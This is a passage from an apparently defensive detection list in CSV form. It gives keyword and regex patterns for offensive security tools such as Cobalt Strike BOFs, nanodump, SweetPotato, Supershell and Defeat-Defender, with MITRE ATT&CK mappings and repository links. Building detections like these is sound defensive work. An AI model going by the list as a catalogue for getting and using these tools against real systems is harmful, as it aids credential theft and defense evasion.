Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*SUID3NUM -*",".{0,1000}SUID3NUM\s\-.{0,1000}","offensive_tool_keyword","SUID3NUM","A standalone python2/3 script which utilizes pythons built-in modules to find SUID bins. separate default bins from custom bins. cross-match those with bins in GTFO Bins repository & auto-exploit those. all with colors!
","T1168 - T1553 - T1210 - T1059","TA0001 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Anon-Exploiter/SUID3NUM","1","0","N/A","N/A","6","595","126","2021-08-15T20:37:50Z","2019-10-12T07:40:24Z" "*sullo/nikto*",".{0,1000}sullo\/nikto.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7885","1156","2024-05-01T02:01:39Z","2012-11-24T04:24:29Z" "*SunloginClient_11.0.0.33162_X64.exe*",".{0,1000}SunloginClient_11\.0\.0\.33162_X64\.exe.{0,1000}","offensive_tool_keyword","POC","SunloginClient RCE vulnerable version","T1587","TA0001 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/sunlogin_rce","1","1","N/A","N/A","5","474","199","2022-02-16T16:11:42Z","2022-02-16T14:20:41Z" "*sunnyelf/cheetah/archive/master.zip*",".{0,1000}sunnyelf\/cheetah\/archive\/master\.zip.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","1","N/A","10","7","618","153","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z" "*sunnyelf[@hackfun.org]*",".{0,1000}sunnyelf\[\@hackfun\.org\].{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","10","7","618","153","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z" "*superhedgy/AttackSurfaceMapper*",".{0,1000}superhedgy\/AttackSurfaceMapper.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - 
T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","1","N/A","6","10","1271","193","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z" "*Supernova.exe -*",".{0,1000}Supernova\.exe\s\-.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","6","573","100","2024-04-30T14:35:29Z","2023-08-08T11:30:34Z" "*Supernova-main.zip*",".{0,1000}Supernova\-main\.zip.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","1","N/A","10","6","573","100","2024-04-30T14:35:29Z","2023-08-08T11:30:34Z" "*supershell*winpty.dll*",".{0,1000}supershell.{0,1000}winpty\.dll.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","1275","159","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*supershell*winpty-agent.exe*",".{0,1000}supershell.{0,1000}winpty\-agent\.exe.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","1275","159","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*Supply either a 32-character RC4/NT hash or a 64-character AES256 hash*",".{0,1000}Supply\seither\sa\s32\-character\sRC4\/NT\shash\sor\sa\s64\-character\sAES256\shash.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*surajpkhetani/AutoSmuggle*",".{0,1000}surajpkhetani\/AutoSmuggle.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","3","214","28","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z" "*suspended_run *",".{0,1000}suspended_run\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" 
"*suspendresume.x64.*",".{0,1000}suspendresume\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*suspendresume.x86.*",".{0,1000}suspendresume\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*'svc_smuggling'*",".{0,1000}\'svc_smuggling\'.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*svc_stager.exe*",".{0,1000}svc_stager\.exe.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*SW2_GetSyscallNumber*",".{0,1000}SW2_GetSyscallNumber.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 
- T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","10","10","172","30","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z" "*SW2_GetSyscallNumber*",".{0,1000}SW2_GetSyscallNumber.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*SW2_HashSyscall*",".{0,1000}SW2_HashSyscall.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth 
Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","10","10","172","30","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z" "*SW2_PopulateSyscallList*",".{0,1000}SW2_PopulateSyscallList.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","10","10","172","30","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z" "*SW2_PopulateSyscallList*",".{0,1000}SW2_PopulateSyscallList.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*SW2_RVA2VA*",".{0,1000}SW2_RVA2VA.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","10","10","172","30","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z" "*SW2_RVA2VA*",".{0,1000}SW2_RVA2VA.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*SW3_GetSyscallAddress*",".{0,1000}SW3_GetSyscallAddress.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*swagkarna/Defeat-Defender-V*",".{0,1000}swagkarna\/Defeat\-Defender\-V.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","1","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*swaks --to * --from * --header *Subject: * --body * --server *",".{0,1000}swaks\s\-\-to\s.{0,1000}\s\-\-from\s.{0,1000}\s\-\-header\s.{0,1000}Subject\:\s.{0,1000}\s\-\-body\s.{0,1000}\s\-\-server\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*SwampThing.exe*",".{0,1000}SwampThing\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","22","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "*SwampThing.exe*",".{0,1000}SwampThing\.exe.{0,1000}","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*SwampThing.pdb*",".{0,1000}SwampThing\.pdb.{0,1000}","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. 
The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*SwampThing.sln*",".{0,1000}SwampThing\.sln.{0,1000}","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*SWbemServicesImplant*",".{0,1000}SWbemServicesImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*SweetPotato by @_EthicalChaos_*",".{0,1000}SweetPotato\sby\s\@_EthicalChaos_.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*sweetpotato -p*",".{0,1000}sweetpotato\s\-p.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*SweetPotato.cna*",".{0,1000}SweetPotato\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - 
T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","238","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" "*SweetPotato.csproj*",".{0,1000}SweetPotato\.csproj.{0,1000}","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","238","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" "*SweetPotato.exe*",".{0,1000}SweetPotato\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","238","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" "*SweetPotato.exe*",".{0,1000}SweetPotato\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SweetPotato.exe*",".{0,1000}SweetPotato\.exe.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*SweetPotato.ImpersonationToken*",".{0,1000}SweetPotato\.ImpersonationToken.{0,1000}","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - 